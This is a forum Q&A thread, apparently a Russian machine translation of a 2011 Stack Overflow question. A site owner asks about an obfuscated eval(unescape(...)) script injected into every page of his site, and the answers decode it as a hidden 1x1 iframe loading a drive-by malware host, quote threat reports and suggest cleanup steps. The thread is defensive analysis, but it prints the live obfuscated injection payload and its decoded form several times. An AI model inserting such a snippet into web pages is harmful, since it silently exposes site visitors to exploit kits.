Этот сайт может распространять вредоносное ПО? странный JavaScript? - PullRequest
Новая
       4

Этот сайт может распространять вредоносное ПО? странный JavaScript?

3 голосов
/ 18 января 2011 
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

Мой сайт www.safwanmanpower.com атакован скриптом вредоносного ПО на каждой странице, и я не знаю, почему этот скрипт вообще может кто-нибудь сказать, как этот скрипт может повлиять на вредоносное ПО моего сайта ??

в надежде на быстрый и положительный ответ.

отредактировано

как Sumone может атаковать мой сайт без разрешения на загрузку ??

Ответы [ 10 ]

6 голосов
/ 18 января 2011

Ваш сайт был взломан известным лицом. Ваша страница теперь предоставляет эксплойты вашим посетителям и подвергает их риску.

Заберите свой сайт сейчас и обратитесь к: http://safeweb.norton.com/report/show?name=sedpoo.com


Threat Report
Total threats found: 4

Drive-By Downloads (what's this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?687328


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?-560137484


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?2443640

Viruses (what's this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:    Trojan.Gen
Location:    http://sedpoo.com/des.jar

А: http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.

Я не буду посещать сайт атаки sedpoo, пока вы не изучите угрозу и не будете готовы бороться с потенциальными инфекциями, которые могут возникнуть Раскрутка виртуальной машины для посещения сайта - это быстрый способ дальнейшего расследования, без ущерба для вашей рабочей станции и данных.

4 голосов
/ 18 января 2011

неэкранированный код выглядит примерно так: 

document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

При его оценке на ваш сайт добавляется 1px на 1px iframe, который указывает на указанный выше адрес.

3 голосов
/ 20 октября 2012

Вы должны использовать smscanner (Simple Server Malware Scanner), который будет сканировать зараженные файлы, сценарии, запутанные коды JavaScript, оболочки и т. Д. И т. Д. До сих пор он работает на веб-серверах Linux

Подробнее @ https://sourceforge.net/projects/smscanner/

1 голос
/ 18 января 2011

При удалении пробела он декодирует в: 

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
1 голос
/ 18 января 2011

в Chrome, который не может перейти в "document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')", что, как говорит мне Chrome, является сайтом, на котором размещено вредоносное ПО.

0 голосов
/ 02 января 2012

Вот обесцененный код JavaScript: 

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
0 голосов
/ 18 января 2011

Я отвечу на прямой вопрос: внедрение скрипта на каждую страницу означает, что хакер получил контроль над веб-сервером, возможно, над всей веб-фермой хоста.

Как? Может быть, он украл пароль администратора. Возможно, он работал на хозяина и использовал заднюю дверь, которую он посадил. Вы не можете действительно знать, и если вы принимаете, вы не сможете защитить себя, так как это ответственность хозяина.

Если вы принимаете хост, найдите другой и более надежный хост. В противном случае сделайте так, как прокомментировал Cfreak, и измените все пароли на сервере, установите новый мощный брандмауэр и т. Д. И т. Д. *

Изменить: если сервер принадлежит вам (то есть вы не используете сторонний хост), проверьте журнал событий безопасности и посмотрите, кто вошел в систему во время заражения. Очевидно, запустите полное сканирование на наличие вирусов и вредоносных программ.

0 голосов
/ 18 января 2011

Выкрутил код, используя инструмент здесь , чтобы получить

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

, который встраивает фрейм 1px x 1px (эффективно невидимый) в вашу страницу,отсюда, скорее всего, он нападает на ваших посетителей с помощью эксплойтов или просто пытается создать рекламные окна

0 голосов
/ 18 января 2011

Неэкранированный код: 

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

, который создает iFrame для http://sedpoo.com/?338375, который, я предполагаю, будет генерировать всплывающие окна для рекламы и т. Д.

0 голосов
/ 18 января 2011

Если вы хотите увидеть, что делает этот код, вставьте экранированный код в этот URL (я сделал это, и он пытается перенаправить ваш сайт на другую ссылку): http://www.linkedresources.com/tools/unescaper_v0.2b1.html

Используете ли вы какую-либо систему управления контентом (CMS) на вашем сайте?Если это так, лучшее, что вы можете сделать, это зайти на сайт этой CMS и загрузить последнюю версию.

...